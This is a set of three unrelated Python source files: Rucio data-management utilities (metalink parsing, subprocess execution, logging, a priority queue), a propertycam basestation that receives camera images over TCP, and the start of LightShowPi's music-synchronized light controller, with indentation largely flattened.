each dictionary describes a file with its replicas.
Will be called by parse_replicas_from_file and parse_replicas_from_string.
:param root: root node of the metalink tree
:returns: a list with a dictionary for each file
"""
files = []
# metalink namespace
ns = '{urn:ietf:params:xml:ns:metalink}'
str_to_bool = {'true': True, 'True': True, 'false': False, 'False': False}
# loop over all <file> tags of the metalink string
for file_tag_obj in root.findall(ns + 'file'):
# search for identity-tag
identity_tag_obj = file_tag_obj.find(ns + 'identity')
if not ElementTree.iselement(identity_tag_obj):
raise InputValidationError('Failed to locate identity-tag inside %s' % ElementTree.tostring(file_tag_obj))
cur_file = {'did': identity_tag_obj.text,
'adler32': None,
'md5': None,
'sources': []}
parent_dids = set()
parent_dids_tag_obj = file_tag_obj.find(ns + 'parents')
if ElementTree.iselement(parent_dids_tag_obj):
for did_tag_obj in parent_dids_tag_obj.findall(ns + 'did'):
parent_dids.add(did_tag_obj.text)
cur_file['parent_dids'] = parent_dids
size_tag_obj = file_tag_obj.find(ns + 'size')
cur_file['bytes'] = int(size_tag_obj.text) if ElementTree.iselement(size_tag_obj) else None
for hash_tag_obj in file_tag_obj.findall(ns + 'hash'):
hash_type = hash_tag_obj.get('type')
if hash_type:
cur_file[hash_type] = hash_tag_obj.text
for url_tag_obj in file_tag_obj.findall(ns + 'url'):
key_rename_map = {'location': 'rse'}
src = {}
for k, v in url_tag_obj.items():
k = key_rename_map.get(k, k)
src[k] = str_to_bool.get(v, v)
src['pfn'] = url_tag_obj.text
cur_file['sources'].append(src)
files.append(cur_file)
return files
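# A small, self-contained sketch of the metalink layout that parse_replicas_metalink
# understands; the DID, RSE and PFN below are made up for illustration.
def _example_parse_replicas_metalink():
    metalink = """<metalink xmlns="urn:ietf:params:xml:ns:metalink">
  <file name="file_1">
    <identity>mock:file_1</identity>
    <size>1024</size>
    <hash type="adler32">0cc737eb</hash>
    <url location="MOCK_RSE" priority="1">root://mock.example.org/path/file_1</url>
  </file>
</metalink>"""
    files = parse_replicas_from_string(metalink)
    # files[0] == {'did': 'mock:file_1', 'adler32': '0cc737eb', 'md5': None, 'bytes': 1024,
    #              'parent_dids': set(),
    #              'sources': [{'rse': 'MOCK_RSE', 'priority': '1',
    #                           'pfn': 'root://mock.example.org/path/file_1'}]}
    return files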
def get_thread_with_periodic_running_function(interval, action, graceful_stop):
"""
Get a thread where a function runs periodically.
:param interval: Interval in seconds at which the action function should run.
:param action: Function, that should run periodically.
:param graceful_stop: Threading event used to check for graceful stop.
"""
def start():
while not graceful_stop.is_set():
starttime = time.time()
action()
time.sleep(max(0, interval - (time.time() - starttime)))
t = threading.Thread(target=start)
return t
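# A minimal usage sketch: run a (hypothetical) no-op action every few seconds until the
# graceful_stop event is set. The thread only checks graceful_stop between iterations, so
# setting the event takes effect after the current sleep finishes.
def _example_periodic_thread():
    graceful_stop = threading.Event()
    heartbeat = get_thread_with_periodic_running_function(interval=2, action=lambda: None, graceful_stop=graceful_stop)
    heartbeat.start()
    time.sleep(5)
    graceful_stop.set()
    heartbeat.join()
    return heartbeat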
def run_cmd_process(cmd, timeout=3600):
"""
Run a shell command with a timeout.
:param cmd: shell command as a string
:param timeout: timeout in seconds
:return: tuple of (returncode, stdout); stderr, if any, is appended to stdout
"""
time_start = time.time()
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, preexec_fn=os.setsid)
running_time = 0
while process.poll() is None and running_time < timeout:
running_time = int(time.time() - time_start)
time.sleep(3)
if process.poll() is None:
process.terminate()
time.sleep(3)
if process.poll() is None:
process.kill()
stdout, stderr = process.communicate()
if isinstance(stdout, binary_type):
stdout = ensure_text(stdout, errors='replace')
stderr = ensure_text(stderr, errors='replace')
if not stderr:
stderr = ''
if not stdout:
stdout = ''
if stderr and stderr != '':
stdout += " Error: " + stderr
if process:
returncode = process.returncode
else:
returncode = 1
if returncode != 1 and 'Command time-out' in stdout:
returncode = 1
if returncode is None:
returncode = 0
return returncode, stdout
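# A minimal usage sketch (the command is only an example): run a short shell command and
# collect its output; stderr, if present, is appended to the returned stdout string.
def _example_run_cmd_process():
    returncode, output = run_cmd_process('echo hello', timeout=60)
    return returncode, output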
def api_update_return_dict(dictionary, session=None):
"""
Ensure that rse is in a dictionary returned from core
:param dictionary: The dictionary to edit
:param session: The DB session to use
:returns dictionary: The edited dictionary
"""
if not isinstance(dictionary, dict):
return dictionary
copied = False # Avoid side effects from pass by object
for rse_str in ['rse', 'src_rse', 'source_rse', 'dest_rse', 'destination_rse']:
rse_id_str = '%s_id' % rse_str
if rse_id_str in dictionary.keys() and dictionary[rse_id_str] is not None:
if rse_str not in dictionary.keys():
if not copied:
dictionary = dictionary.copy()
copied = True
import rucio.core.rse
dictionary[rse_str] = rucio.core.rse.get_rse_name(rse_id=dictionary[rse_id_str], session=session)
if 'account' in dictionary.keys() and dictionary['account'] is not None:
if not copied:
dictionary = dictionary.copy()
copied = True
dictionary['account'] = dictionary['account'].external
if 'scope' in dictionary.keys() and dictionary['scope'] is not None:
if not copied:
dictionary = dictionary.copy()
copied = True
dictionary['scope'] = dictionary['scope'].external
return dictionary
def get_parsed_throttler_mode(throttler_mode):
""" Parse the conveyor-throttler mode string. """
direction = None
all_activities = None
if throttler_mode == 'DEST_PER_ACT':
direction = 'destination'
all_activities = False
elif throttler_mode == 'DEST_PER_ALL_ACT':
direction = 'destination'
all_activities = True
elif throttler_mode == 'SRC_PER_ACT':
direction = 'source'
all_activities = False
elif throttler_mode == 'SRC_PER_ALL_ACT':
direction = 'source'
all_activities = True
return (direction, all_activities)
def setup_logger(module_name=None, logger_name=None, logger_level=None, verbose=False):
'''
Factory method to set logger with handlers.
:param module_name: __name__ of the module that is calling this method
:param logger_name: name of the logger, typically name of the module.
:param logger_level: if not given, fetched from config.
:param verbose: verbose option set in bin/rucio
'''
# helper method for cfg check
def _force_cfg_log_level(cfg_option):
cfg_forced_modules = config_get('logging', cfg_option, raise_exception=False, default=None, clean_cached=True,
check_config_table=False)
if cfg_forced_modules:
if re.match(str(cfg_forced_modules), module_name):
return True
return False
# creating log
if not logger_name:
if not module_name:
logger_name = 'usr'
else:
logger_name = module_name.split('.')[-1]
logger = logging.getLogger(logger_name)
# extracting the log level
if not logger_level:
logger_level = logging.INFO
if verbose:
logger_level = logging.DEBUG
# overriding by the config
cfg_levels = (logging.DEBUG, logging.INFO, logging.WARNING, logging.ERROR)
for level in cfg_levels:
cfg_opt = 'forceloglevel' + logging.getLevelName(level)
if _force_cfg_log_level(cfg_opt):
logger_level = level
# setting the log level
logger.setLevel(logger_level)
# preferred logger handling
def add_handler(logger):
hdlr = logging.StreamHandler()
def emit_decorator(fnc):
def func(*args):
if 'RUCIO_LOGGING_FORMAT' not in os.environ:
levelno = args[0].levelno
format_str = '%(asctime)s\t%(levelname)s\t%(message)s\033[0m'
if levelno >= logging.CRITICAL:
color = '\033[31;1m'
elif levelno >= logging.ERROR:
color = '\033[31;1m'
elif levelno >= logging.WARNING:
color = '\033[33;1m'
elif levelno >= logging.INFO:
color = '\033[32;1m'
elif levelno >= logging.DEBUG:
color = '\033[36;1m'
format_str = '%(asctime)s\t%(levelname)s\t%(filename)s\t%(message)s\033[0m'
else:
color = '\033[0m'
formatter = logging.Formatter('{0}{1}'.format(color, format_str))
else:
formatter = logging.Formatter(os.environ['RUCIO_LOGGING_FORMAT'])
hdlr.setFormatter(formatter)
return fnc(*args)
return func
hdlr.emit = emit_decorator(hdlr.emit)
logger.addHandler(hdlr)
# setting handler and formatter
if not logger.handlers:
add_handler(logger)
return logger
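# A minimal usage sketch: create a module-scoped logger; verbose=True lowers the level to
# DEBUG unless a forceloglevel* option in the 'logging' config section overrides it.
def _example_setup_logger():
    logger = setup_logger(module_name=__name__, verbose=True)
    logger.debug('logger initialised')
    return logger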
def daemon_sleep(start_time, sleep_time, graceful_stop, logger=logging.log):
"""Sleeps a daemon the time provided by sleep_time"""
end_time = time.time()
time_diff = end_time - start_time
if time_diff < sleep_time:
logger(logging.INFO, 'Sleeping for a while : %s seconds', (sleep_time - time_diff))
graceful_stop.wait(sleep_time - time_diff)
def is_client():
""""
Checks if the function is called from a client or from a server/daemon
:returns client_mode: True if is called from a client, False if it is called from a server/daemon
"""
if 'RUCIO_CLIENT_MODE' not in os.environ:
try:
if config_has_section('database'):
client_mode = False
elif config_has_section('client'):
client_mode = True
else:
client_mode = False
except RuntimeError:
# If no configuration file is found the default value should be True
client_mode = True
else:
if os.environ['RUCIO_CLIENT_MODE']:
client_mode = True
else:
client_mode = False
return client_mode
class retry:
"""Retry callable object with configuragle number of attempts"""
def __init__(self, func, *args, **kwargs):
'''
:param func: a method that should be executed with retries
:param args: positional arguments of func
:param kwargs: keyword arguments of func
'''
self.func, self.args, self.kwargs = func, args, kwargs
def __call__(self, mtries=3, logger=logging.log):
'''
:param mtries: maximum number of attempts to execute the function
:param logger: preferred logger
'''
attempt = mtries
while attempt > 1:
try:
if logger:
logger(logging.DEBUG, '{}: Attempt {}'.format(self.func.__name__, mtries - attempt + 1))
return self.func(*self.args, **self.kwargs)
except Exception as e:
if logger:
logger(logging.DEBUG, '{}: Attempt failed {}'.format(self.func.__name__, mtries - attempt + 1))
logger(logging.DEBUG, str(e))
attempt -= 1
return self.func(*self.args, **self.kwargs)
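# A minimal usage sketch: wrap a callable and its arguments, then invoke the wrapper with
# the desired number of attempts; the final attempt re-raises any exception to the caller.
def _example_retry():
    parse_number = retry(int, '42')
    return parse_number(mtries=3)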
class StoreAndDeprecateWarningAction(argparse.Action):
'''
StoreAndDeprecateWarningAction is a descendant of :class:`argparse.Action`
and represents a store action with a deprecated argument name.
'''
def __init__(self,
option_strings,
new_option_string,
dest,
**kwargs):
"""
:param option_strings: all possible argument name strings
:param new_option_string: the new option string which replaces the old
:param dest: name of variable to store the value in
:param kwargs: everything else
"""
super(StoreAndDeprecateWarningAction, self).__init__(
option_strings=option_strings,
dest=dest,
**kwargs)
assert new_option_string in option_strings
self.new_option_string = new_option_string
def __call__(self, parser, namespace, values, option_string=None):
if option_string and option_string != self.new_option_string:
# The logger gets typically initialized after the argument parser
# to set the verbosity of the logger. Thus using simple print to console.
print("Warning: The commandline argument {} is deprecated! Please use {} in the future.".format(option_string, self.new_option_string))
setattr(namespace, self.dest, values)
class StoreTrueAndDeprecateWarningAction(argparse._StoreConstAction):
'''
StoreTrueAndDeprecateWarningAction is a descendant of :class:`argparse._StoreConstAction`
and represents a store-true action with a deprecated argument name.
'''
def __init__(self,
option_strings,
new_option_string,
dest,
default=False,
required=False,
help=None):
"""
:param option_strings: all possible argument name strings
:param new_option_string: the new option string which replaces the old
:param dest: name of variable to store the value in
:param default: default value of the flag
:param required: whether the argument is required
:param help: help text for the argument
"""
super(StoreTrueAndDeprecateWarningAction, self).__init__(
option_strings=option_strings,
dest=dest,
const=True,
default=default,
required=required,
help=help)
assert new_option_string in option_strings
self.new_option_string = new_option_string
def __call__(self, parser, namespace, values, option_string=None):
super(StoreTrueAndDeprecateWarningAction, self).__call__(parser, namespace, values, option_string=option_string)
if option_string and option_string != self.new_option_string:
# The logger gets typically initialized after the argument parser
# to set the verbosity of the logger. Thus using simple print to console.
print("Warning: The commandline argument {} is deprecated! Please use {} in the future.".format(option_string, self.new_option_string))
class PriorityQueue:
"""
Heap-based [1] priority queue which supports priority update operations
It is used as a dictionary: pq['element'] = priority
It is a min-heap on the priority value: the element with the smallest value (treated as
the highest priority) can be accessed with pq.top() or removed with pq.pop().
[1] https://en.wikipedia.org/wiki/Heap_(data_structure)
"""
class ContainerSlot:
def __init__(self, position, priority):
self.pos = position
self.prio = priority
def __init__(self):
self.heap = []
self.container = {}
self.empty_slots = []
def __len__(self):
return len(self.heap)
def __getitem__(self, item):
return self.container[item].prio
def __setitem__(self, key, value):
if key in self.container:
existing_prio = self.container[key].prio
self.container[key].prio = value
if value < existing_prio:
self._priority_decreased(key)
elif existing_prio < value:
self._priority_increased(key)
else:
self.heap.append(key)
self.container[key] = self.ContainerSlot(position=len(self.heap) - 1, priority=value)
self._priority_decreased(key)
def __contains__(self, item):
return item in self.container
def top(self):
return self.heap[0]
def pop(self):
item = self.heap[0]
self.container.pop(item)
tmp_item = self.heap.pop()
if self.heap:
self.heap[0] = tmp_item
self.container[tmp_item].pos = 0
self._priority_increased(tmp_item)
return item
def _priority_decreased(self, item):
heap_changed = False
pos = self.container[item].pos
pos_parent = (pos - 1) // 2
while pos > 0 and self.container[self.heap[pos]].prio < self.container[self.heap[pos_parent]].prio:
tmp_item, parent = self.heap[pos], self.heap[pos_parent] = self.heap[pos_parent], self.heap[pos]
self.container[tmp_item].pos, self.container[parent].pos = self.container[parent].pos, self.container[tmp_item].pos
pos = pos_parent
pos_parent = (pos - 1) // 2
heap_changed = True
return heap_changed
def _priority_increased(self, item):
heap_changed = False
heap_len = len(self.heap)
pos = self.container[item].pos
pos_child1 = 2 * pos + 1
pos_child2 = 2 * pos + 2
heap_restored = False
while not heap_restored:
# find minimum between item, child1, and child2
if pos_child1 < heap_len and self.container[self.heap[pos_child1]].prio < self.container[self.heap[pos]].prio:
pos_min = pos_child1
else:
pos_min = pos
if pos_child2 < heap_len and self.container[self.heap[pos_child2]].prio < self.container[self.heap[pos_min]].prio:
pos_min = pos_child2
if pos_min != pos:
_, tmp_item = self.heap[pos_min], self.heap[pos] = self.heap[pos], self.heap[pos_min]
self.container[tmp_item].pos = pos
pos = pos_min
pos_child1 = 2 * pos + 1
pos_child2 = 2 * pos + 2
heap_changed = True
else:
heap_restored = True
self.container[self.heap[pos]].pos = pos
return heap_changed
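# A minimal usage sketch with made-up keys: items get numeric priorities through item
# assignment; pop() always returns the key whose priority value is currently smallest.
def _example_priority_queue():
    pq = PriorityQueue()
    pq['rule-a'] = 5
    pq['rule-b'] = 1
    pq['rule-c'] = 3
    pq['rule-a'] = 0          # update an existing priority in place
    order = [pq.pop() for _ in range(len(pq))]
    # order == ['rule-a', 'rule-b', 'rule-c']
    return order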
def register_policy_package_algorithms(algorithm_type, dictionary):
'''
Loads all the algorithms of a given type from the policy package(s) and registers them.
:param algorithm_type: the type of algorithm to register (e.g. 'surl', 'lfn2pfn')
:param dictionary: the dictionary to register them in
'''
def try_importing_policy(algorithm_type, dictionary, vo=None):
import importlib
try:
env_name = 'RUCIO_POLICY_PACKAGE' + ('' if not vo else '_' + vo.upper())
if env_name in os.environ:
package = os.environ[env_name]
else:
package = config.config_get('policy', 'package' + ('' if not vo else '-' + vo))
module = importlib.import_module(package)
if hasattr(module, 'get_algorithms'):
all_algorithms = module.get_algorithms()
if algorithm_type in all_algorithms:
algorithms = all_algorithms[algorithm_type]
if not vo:
dictionary.update(algorithms)
else:
# check that the names are correctly prefixed
for k in algorithms.keys():
if k.lower().startswith(vo.lower()):
dictionary[k] = algorithms[k]
else:
raise InvalidAlgorithmName(k, vo)
except (NoOptionError, NoSectionError, ImportError):
pass
from rucio.common import config
try:
multivo = config.config_get_bool('common', 'multi_vo')
except (NoOptionError, NoSectionError):
multivo = False
if not multivo:
# single policy package
try_importing_policy(algorithm_type, dictionary)
else:
# determine whether on client or server
client = False
if 'RUCIO_CLIENT_MODE' not in os.environ:
if not config.config_has_section('database') and config.config_has_section('client'):
client = True
else:
if os.environ['RUCIO_CLIENT_MODE']:
client = True
# on client, only register algorithms for selected VO
if client:
if 'RUCIO_VO' in os.environ:
vo = os.environ['RUCIO_VO']
else:
try:
vo = config.config_get('client', 'vo')
except (NoOptionError, NoSectionError):
vo = 'def'
try_importing_policy(algorithm_type, dictionary, vo)
# on server, list all VOs and register their algorithms
else:
from rucio.core.vo import list_vos
# policy package per VO
vos = list_vos()
for vo in vos:
try_importing_policy(algorithm_type, dictionary, vo['vo'])
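# A sketch of the interface a policy package is expected to provide (all names below are
# illustrative): a module reachable via the RUCIO_POLICY_PACKAGE environment variable or
# the [policy] package config option, exposing get_algorithms() that maps algorithm types
# to dictionaries of named callables. In multi-VO mode the names must be prefixed with
# the VO name. The function below only shows the expected return shape.
def _example_policy_package_get_algorithms():
    def _example_algorithm(*args, **kwargs):
        # hypothetical placeholder; a real algorithm implements the experiment's conventions
        raise NotImplementedError('illustrative placeholder')
    return {'lfn2pfn': {'example_lfn2pfn': _example_algorithm}}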
|
server.py
|
'''
Basestation receives photos captured by propertycam camera units.
'''
import socket
import datetime
import socketserver
import http.server
import threading
from basestation.datastore import DataStore
from basestation.snap import Snap
from basestation.snappipeline import SnapPipeline
# Serve snap images via an HTTP server
print('Propertycam basestation http file server starting')
server_address = ('', 8000)
handler = http.server.SimpleHTTPRequestHandler
httpd = socketserver.TCPServer(server_address, handler)
httpd_thread = threading.Thread(target=httpd.serve_forever)
httpd_thread.daemon = True
httpd_thread.start()
print('httpd thread started')
# Create TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Bind the socket to a port
#server_address = ('localhost', 50000)
server_address = ('', 50000)
sock.bind(server_address)
sock.listen()
print('Propertycam basestation listening on %s port %s' % server_address)
# TODO: Wait for cameras to connect
# Add connected cameras to datastore
ds = DataStore()
camera_mac_address = '001122334455'
ds.add_camera(camera_mac_address)
# Create snap processing pipeline
snap_pipeline = SnapPipeline(ds)
# Continuously accept and handle connections
while True:
# Wait for connection
connection, client_addr = sock.accept()
print('Connection from ', client_addr)
# TODO: Get camera MAC address and snap time from camera
camera_mac_address = '001122334455'
snap_time = datetime.datetime.now()
# Receive snap parts and store in buffer
snap_buffer = bytes()
part_size = 1024
part_buffer = connection.recv(part_size)
partnum = 1
while part_buffer:
#print('Received part ', partnum)
snap_buffer += part_buffer
part_buffer = connection.recv(part_size)
partnum = partnum + 1
# Finished receiving
print("Done receiving")
connection.close()
# Execute snap pipeline
snap = Snap(camera_mac_address, snap_time, snap_buffer)
snap_pipeline.execute(snap)
# Wait for http server thread to finish
httpd_thread.join()
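# A hypothetical camera-side sketch (not part of the basestation): connect to the
# basestation on port 50000, stream the image bytes, then close the socket so the
# receive loop above sees an empty read and finishes the snap.
def example_send_snap(image_bytes, host='localhost', port=50000):
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as cam_sock:
        cam_sock.connect((host, port))
        cam_sock.sendall(image_bytes)
    # closing the socket signals end-of-snap to the basestation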
|
synchronized_lights.py
|
#!/usr/bin/env python
#
# Licensed under the BSD license. See full license in LICENSE file.
# http://www.lightshowpi.org/
#
# Author: Todd Giles (todd@lightshowpi.org)
# Author: Chris Usey (chris.usey@gmail.com)
# Author: Ryan Jennings
# Author: Paul Dunn (dunnsept@gmail.com)
# Author: Tom Enos (tomslick.ca@gmail.com)
"""Play any audio file and synchronize lights to the music
When executed, this script will play an audio file, as well as turn on
and off N channels of lights to the music (by default the first 8 GPIO
channels on the Raspberry Pi), based upon music it is playing. Many
types of audio files are supported (see decoder.py below), but it has
only been tested with wav and mp3 at the time of this writing.
The timing of the lights turning on and off is based upon the frequency
response of the music being played. A short segment of the music is
analyzed via FFT to get the frequency response across each defined
channel in the audio range. Each light channel is then faded in and
out based upon the amplitude of the frequency response in the
corresponding audio channel. Fading is accomplished with a software
PWM output. Each channel can also be configured to simply turn on and
off as the frequency response in the corresponding channel crosses a
threshold.
FFT calculation can be CPU intensive and in some cases can adversely
affect playback of songs (especially if attempting to decode the song
as well, as is the case for an mp3). For this reason, the FFT
calculations are cached after the first time a new song is played.
The values are cached in a gzipped text file in the same location as the
song itself. Subsequent requests to play the same song will use the
cached information and not recompute the FFT, thus reducing CPU
utilization dramatically and allowing for clear music playback of all
audio file types.
Recent optimizations have improved this dramatically and most users are
no longer reporting adverse playback of songs even on the first
playback.
Sample usage:
To play an entire list -
sudo python synchronized_lights.py --playlist=/home/pi/music/.playlist
To play a specific song -
sudo python synchronized_lights.py --file=/home/pi/music/jingle_bells.mp3
Third party dependencies:
alsaaudio: for audio input/output
http://pyalsaaudio.sourceforge.net/
decoder.py: decoding mp3, ogg, wma, ...
https://pypi.python.org/pypi/decoder.py/1.5XB
numpy: for FFT calculation
http://www.numpy.org/
"""
import configparser
import argparse
import atexit
import audioop
from collections import deque
import errno
import json
import logging as log
import os
import random
import subprocess
import signal
import stat
import sys
import time
import wave
import curses
import bright_curses
import mutagen
from queue import Queue, Empty
from threading import Thread
import alsaaudio as aa
import decoder
import numpy as np
from numpy import where, clip, round, nan_to_num
import Platform
import fft
from prepostshow import PrePostShow
import RunningStats
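# A minimal, illustrative sketch of the idea described in the module docstring (not the
# code path the show actually uses): take an FFT of one audio chunk, group the spectrum
# into one band per light channel, and threshold each band for simple on/off channels.
# The real pipeline lives in fft.FFT plus the running mean/std normalisation below.
def _example_chunk_to_channels(chunk_samples, num_channels=8, threshold=0.5):
    spectrum = np.abs(np.fft.rfft(chunk_samples))
    bands = np.array_split(spectrum, num_channels)
    levels = np.array([band.sum() for band in bands])
    peak = levels.max()
    if peak > 0:
        levels = levels / peak
    return levels > threshold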
# Make sure SYNCHRONIZED_LIGHTS_HOME environment variable is set
HOME_DIR = os.getenv("SYNCHRONIZED_LIGHTS_HOME")
if not HOME_DIR:
print("Need to setup SYNCHRONIZED_LIGHTS_HOME environment variable, see readme")
sys.exit()
LOG_DIR = HOME_DIR + '/logs'
# logging levels
levels = {'DEBUG': log.DEBUG,
'INFO': log.INFO,
'WARNING': log.WARNING,
'ERROR': log.ERROR,
'CRITICAL': log.CRITICAL}
# Arguments
parser = argparse.ArgumentParser()
parser.add_argument('--log', default=None,
help='Set the logging level. levels:INFO, DEBUG, WARNING, ERROR, CRITICAL')
parser.add_argument('--config', default=None, help='Config File Override')
file_group = parser.add_mutually_exclusive_group()
file_group.add_argument('--playlist', default=None,
help='Playlist to choose song from.')
file_group.add_argument('--file', help='path to the song to play (required if no '
'playlist is designated)')
cache_group = parser.add_mutually_exclusive_group()
cache_group.add_argument('--readcache', type=bool, default=True,
help='read light timing from cache if available. Default: true')
cache_group.add_argument('--createcache', action="store_true",
help='create light timing cache without audio playback or lightshow.')
if parser.parse_args().createcache:
parser.set_defaults(readcache=False)
# Setup log file
log.basicConfig(filename=LOG_DIR + '/music_and_lights.play.dbg',
format='[%(asctime)s] %(levelname)s {%(pathname)s:%(lineno)d} - %(message)s',
level=log.INFO)
args = parser.parse_args()
# import hardware_controller
import hardware_controller
hc = hardware_controller.Hardware(param_config=args.config)
# get copy of configuration manager
cm = hc.cm
if not args.playlist:
args.playlist=cm.lightshow.playlist_path
class Lightshow(object):
def __init__(self):
self.stream = None
self.fm_process = None
self.streaming = None
self.sample_rate = None
self.num_channels = None
self.music_file = None
self.fft_calc = None
self.light_delay = None
self.cache_found = None
self.cache_matrix = None
self.cache_filename = None
self.config_filename = None
self.song_filename = None
self.terminal = None
self.output = lambda raw_data: None
self.mean = np.array([12.0 for _ in range(cm.hardware.gpio_len)], dtype='float32')
self.std = np.array([1.5 for _ in range(cm.hardware.gpio_len)], dtype='float32')
self.attenuate_pct = cm.lightshow.attenuate_pct
self.sd_low = cm.lightshow.SD_low
self.sd_high = cm.lightshow.SD_high
self.decay_factor = cm.lightshow.decay_factor
self.decay = np.zeros(cm.hardware.gpio_len, dtype='float32')
self.physical_gpio_len = cm.hardware.physical_gpio_len
self.network = hc.network
self.server = self.network.networking == "server" or self.network.networking == "serverjson"
self.client = self.network.networking == "client"
if cm.lightshow.use_fifo:
if os.path.exists(cm.lightshow.fifo):
os.remove(cm.lightshow.fifo)
os.mkfifo(cm.lightshow.fifo, 0o777)
self.chunk_size = cm.audio_processing.chunk_size # Use a multiple of 8
atexit.register(self.exit_function)
# Remove traceback on Ctrl-C
signal.signal(signal.SIGINT, lambda x, y: sys.exit(0))
signal.signal(signal.SIGTERM, lambda x, y: sys.exit(0))
if cm.terminal.enabled:
self.terminal = bright_curses.BrightCurses(cm.terminal)
curses.wrapper(self.launch_curses)
def exit_function(self):
"""atexit function"""
if self.server:
self.network.set_playing()
self.network.broadcast([0. for _ in range(cm.hardware.gpio_len)])
time.sleep(1)
self.network.unset_playing()
hc.clean_up()
if cm.fm.enabled:
self.fm_process.kill()
if self.network.network_stream:
self.network.close_connection()
if cm.lightshow.mode == 'stream-in':
try:
self.streaming.stdin.write(b"q")
except IOError:
pass
os.kill(self.streaming.pid, signal.SIGINT)
if cm.lightshow.use_fifo:
os.unlink(cm.lightshow.fifo)
os.system("/bin/echo \"\" >" + cm.home_dir + "/logs/now_playing.txt")
def update_lights(self, matrix):
"""Update the state of all the lights
Update the state of all the lights based upon the current
frequency response matrix
:param matrix: row of data from cache matrix
:type matrix: list
"""
brightness = matrix - self.mean + (self.std * self.sd_low)
brightness = (brightness / (self.std * (self.sd_low + self.sd_high))) \
* (1.0 - (self.attenuate_pct / 100.0))
# ensure that the brightness levels are in the correct range
brightness = clip(brightness, 0.0, 1.0)
# brightness = round(brightness, decimals=3)
brightness = nan_to_num(brightness)
# calculate light decay rate if used
if self.decay_factor > 0:
self.decay = where(self.decay <= brightness,
brightness,
self.decay)
brightness = where(self.decay <= brightness,
brightness,
self.decay)
self.decay = where(self.decay - self.decay_factor > 0,
self.decay - self.decay_factor,
0)
# broadcast to clients if in server mode
if self.server:
self.network.broadcast(brightness)
if self.terminal:
self.terminal.curses_render(brightness)
return
# in the instance a single channel is defined convert scalar back into array
if not hasattr(brightness, "__len__"):
brightness = np.array([brightness])
for pin in range(len(brightness[:self.physical_gpio_len])):
hc.set_light(pin, True, brightness[pin])
if hc.led:
if cm.led.led_channel_configuration == "EXTEND":
leds = brightness[self.physical_gpio_len:]
else:
leds = brightness[:cm.hardware.gpio_len]
for led_instance in hc.led:
led_instance.write_all(leds)
def set_fm(self):
pi_version = Platform.pi_version()
srate = str(int(self.sample_rate / (1 if self.num_channels > 1 else 2)))
if os.path.exists(cm.fm.fmfifo):
os.remove(cm.fm.fmfifo)
os.mkfifo(cm.fm.fmfifo, 0o777)
fm_command = ["sudo",
cm.home_dir + "/bin/pifm",
"-",
cm.fm.frequency,
srate,
"stereo" if self.num_channels > 1 else "mono"]
if pi_version == 2 or pi_version == 3:
fm_command = ["sudo",
cm.home_dir + "/bin/pi_fm_rds",
"-audio", "-", "-freq",
cm.fm.frequency,
"-srate",
srate,
"-ps",
cm.fm.program_service_name,
"-rt",
cm.fm.radio_text,
"-ctl",
cm.fm.fmfifo,
"-nochan",
"2" if self.num_channels > 1 else "1"]
if pi_version == 4:
fm_command = ["sudo",
cm.home_dir + "/bin/pi_fm_adv",
"--audio", "-", "--freq",
cm.fm.frequency,
"--srate",
srate,
"--ps",
cm.fm.program_service_name,
"--rt",
cm.fm.radio_text,
"--ctl",
cm.fm.fmfifo,
"--nochan",
"2" if self.num_channels > 1 else "1"]
log.info("Sending output as fm transmission")
with open(os.devnull, "w") as dev_null:
self.fm_process = subprocess.Popen(fm_command,
stdin=subprocess.PIPE,
stdout=dev_null)
self.output = lambda raw_data: self.fm_process.stdin.write(raw_data)
fmoutthrps = Thread(target=self.update_fmoutps, args=(cm, cm.fm.program_service_name))
fmoutthrps.daemon = True
fmoutthrps.start()
fmoutthrrt = Thread(target=self.update_fmoutrt, args=(cm, cm.fm.radio_text))
fmoutthrrt.daemon = True
fmoutthrrt.start()
def update_fmoutps(self, cm, ps):
ps_chunk_array = [ ps[i:i+8] for i in range(0, len(ps), 8) ]
while True:
for chunk in ps_chunk_array:
os.system("echo PS " + chunk + " > " + cm.fm.fmfifo)
time.sleep(float(cm.fm.ps_increment_delay))
def update_fmoutrt(self, cm, rt):
nptxt = cm.home_dir + "/logs/now_playing.txt"
while True:
with open(nptxt, 'r') as file:
npdata = file.read()
npdata = npdata.replace("'","")
npdata = npdata.replace('"',"")
os.system("echo RT '" + npdata + "' > " + cm.fm.fmfifo)
time.sleep(float(cm.fm.ps_increment_delay))
def set_audio_device(self):
if cm.fm.enabled:
self.set_fm()
elif cm.lightshow.audio_out_card != '':
if cm.lightshow.mode == 'stream-in':
self.num_channels = 2
output_device = aa.PCM(aa.PCM_PLAYBACK, aa.PCM_NORMAL, cm.lightshow.audio_out_card)
output_device.setchannels(self.num_channels)
output_device.setrate(self.sample_rate)
output_device.setformat(aa.PCM_FORMAT_S16_LE)
output_device.setperiodsize(self.chunk_size)
self.output = lambda raw_data: output_device.write(raw_data)
def set_audio_source(self):
stream_reader = None
outq = None
if cm.lightshow.mode == 'audio-in':
# Open the input stream from default input device
self.streaming = aa.PCM(aa.PCM_CAPTURE, aa.PCM_NORMAL, cm.lightshow.audio_in_card)
self.streaming.setchannels(self.num_channels)
self.streaming.setformat(aa.PCM_FORMAT_S16_LE) # Expose in config if needed
self.streaming.setrate(self.sample_rate)
self.streaming.setperiodsize(self.chunk_size)
stream_reader = lambda: self.streaming.read()[-1]
elif cm.lightshow.mode == 'stream-in':
outq = Queue()
if cm.lightshow.use_fifo:
self.streaming = subprocess.Popen(cm.lightshow.stream_command_string,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
preexec_fn=os.setsid)
io = os.open(cm.lightshow.fifo, os.O_RDONLY | os.O_NONBLOCK)
stream_reader = lambda: os.read(io, self.chunk_size)
outthr = Thread(target=self.enqueue_output, args=(self.streaming.stdout, outq))
else:
# Open the input stream from command string
self.streaming = subprocess.Popen(cm.lightshow.stream_command_string,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stream_reader = lambda: self.streaming.stdout.read(self.chunk_size)
outthr = Thread(target=self.enqueue_output, args=(self.streaming.stderr, outq))
outthr.daemon = True
outthr.start()
return stream_reader,outq
def audio_in(self):
"""Control the lightshow from audio coming in from a real time audio"""
self.sample_rate = cm.lightshow.input_sample_rate
self.num_channels = cm.lightshow.input_channels
stream_reader,outq = self.set_audio_source()
log.debug("Running in %s mode - will run until Ctrl+C is pressed" % cm.lightshow.mode)
